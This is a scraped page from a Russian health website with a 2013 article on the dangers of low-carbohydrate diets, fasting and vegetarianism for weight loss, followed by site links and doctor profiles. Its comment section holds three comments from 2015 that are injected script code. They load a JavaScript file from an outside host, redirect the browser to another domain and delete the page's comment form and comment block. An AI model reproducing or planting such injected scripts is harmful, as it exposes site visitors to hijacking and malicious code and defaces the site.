Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мракоборцы. Низкоуглеводн...  >>  Мракоборцы. Низкоуглеводные диеты, голодание, вегетарианство. Похудеть и умереть
 
Обратная связь
 

Мракоборцы. Низкоуглеводные диеты, голодание, вегетарианство. Похудеть и умереть

Размер шрифта
26 августа 2013 00:00
  • google_analytics: false
  • Нравится

«Срочно похудеть за две недели – результат гарантирован!», «Пятидневная чудо-диета», «Похудеть на 10 кг за неделю!» – сотни заголовков в интернете обещают  людям с лишним весом невероятные преображения за невероятно короткие сроки.

Мракоборцы. Низкоуглеводные диеты, Голодание, Вегетарианство. Похудеть и умереть.

Но суждено ли сбыться вашим мечтам о стройной фигуре, если вы последуете таким советам? Без ханжества и мракобесия мы разберемся, какие диеты могут быть опасны для вашего здоровья и что на самом деле поможет вам похудеть.

Низкоуглеводные диеты

Таких диет огромное множество (Дюкана, Аткинса, кремлевская и другие), но суть у всех них одна – много белка и предельно мало углеводов.

На первый взгляд это хорошее решение для фигуры (сравнительное малое количество калорий, белки не откладываются в виде жира). Но низкоуглеводные диеты несут в себе опасности, о которых нужно знать!

1. Высокий уровень холестерина. Следуя низкоуглеводной диете, люди злоупотребляют мясом (говядиной, свининой, бараниной), которое повышает уровень «плохого» холестерина в крови. А это приводит к атеросклерозу и рискам инфаркта и инсульта.

2. Рак. Исследования показывают, что злоупотребление красным мясом повышает риск развития рака желудка и пищевода.

3. Уролитиаз. Доказано, что белковая диета на 250% (!!!) повышает риск развития камней в почках!

4. Усугубление почечной недостаточности. Низкоуглеводная диета повышает нагрузку на почки, поэтому при заболеваниях этих органов строго противопоказана.

Голодание

Отчаявшись похудеть люди часто решают голодать! Однако такая «диета» чрезвычайно опасна для здоровья.

Среди страшных последствий голодания особенно нужно отметить следующие:

1. Проблемы с печенью. Недостаток питательных веществ заставляет печень работать на износ: в ней активизируются ферментативные процессы, цель которых – обеспечить организм (в первую очередь мозг) источниками энергии. В конечном итоге печень не справляется с такой нагрузкой, происходит жировая дистрофия (стеатоз) печеночной ткани, функция печени нарушается.

2. Нарушение обмена веществ – кетоацидоз.

Мозг постоянно нуждается в энергии. В норме единственным источником таковой является глюкоза. При нехватке глюкозы организм вынужден искать альтернативу: в печени активируется липолиз (разрушение жиров), образуются кетоновые тела – это второй источник энергии, который может усваивать мозг. Но повышенный уровень кетоновых тел чреват опасным состоянием – кетоацидозом, которое наносит вред всем системам в организме, в первую очередь – центральной нервной системе (может развиться кетоацидотическая кома). Для людей с сахарным диабетом это особенно актуально: у них и без голодания повышен риск кетоацидоза.

3. Распад мышечной ткани. Организм пытается восполнить дефицит аминокислот: активируются катаболические процессы в мышцах, объем которых значительно снижается.

4. Дефицит витаминов и микроэлементов. Длительное голодание неизбежно приводит к развитию гиповитаминозов и их проявлений (анемия, ломкость волос и ногтей, полинейропатия, кровотечения, иммунодефицит и многие другие).

Вегетарианство

Суть вегетарианской диеты состоит в отказе от продуктов животного происхождения

Часто люди становятся вегетарианцами из идейных соображений, но многие полагают, что с помощью этой диеты могут похудеть.

Признавая положительные эффекты вегетарианской диеты (в частности, сниженный риск атеросклероза и ишемической болезни сердца), мы не можем не отметить, что:

1. Многие продукты растительного происхождения обладают высоким гликемическим индексом.

Отказавшись от мяса, люди зачастую налегают на хлебобулочные изделия, фрукты и другие продукты с высоким гликемическим индексом. Они приводят к резкому повышению уровня инсулина, поэтому вы очень скоро вновь захотите есть.

2. В растительных продуктах не хватает многих полезных веществ.

А именно – омега-3 полиненасыщенных жирных кислот, витамина B12 и D, железа, кальция и так далее.

Вывод

Неужели все диеты иллюзорны, и придется расстаться с мечтой об идеальной фигуре? Вовсе нет. Вы можете похудеть, и непременно сделаете это, если внимательно ознакомитесь с нашим разделом «Сбрось лишнее»!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Перекус, который заставит вас купить штаны на размер меньше в Новом году  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 16 июля 2013Противозачаточные средства могут вылечить анорексию! А помогут ли они похудеть?
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.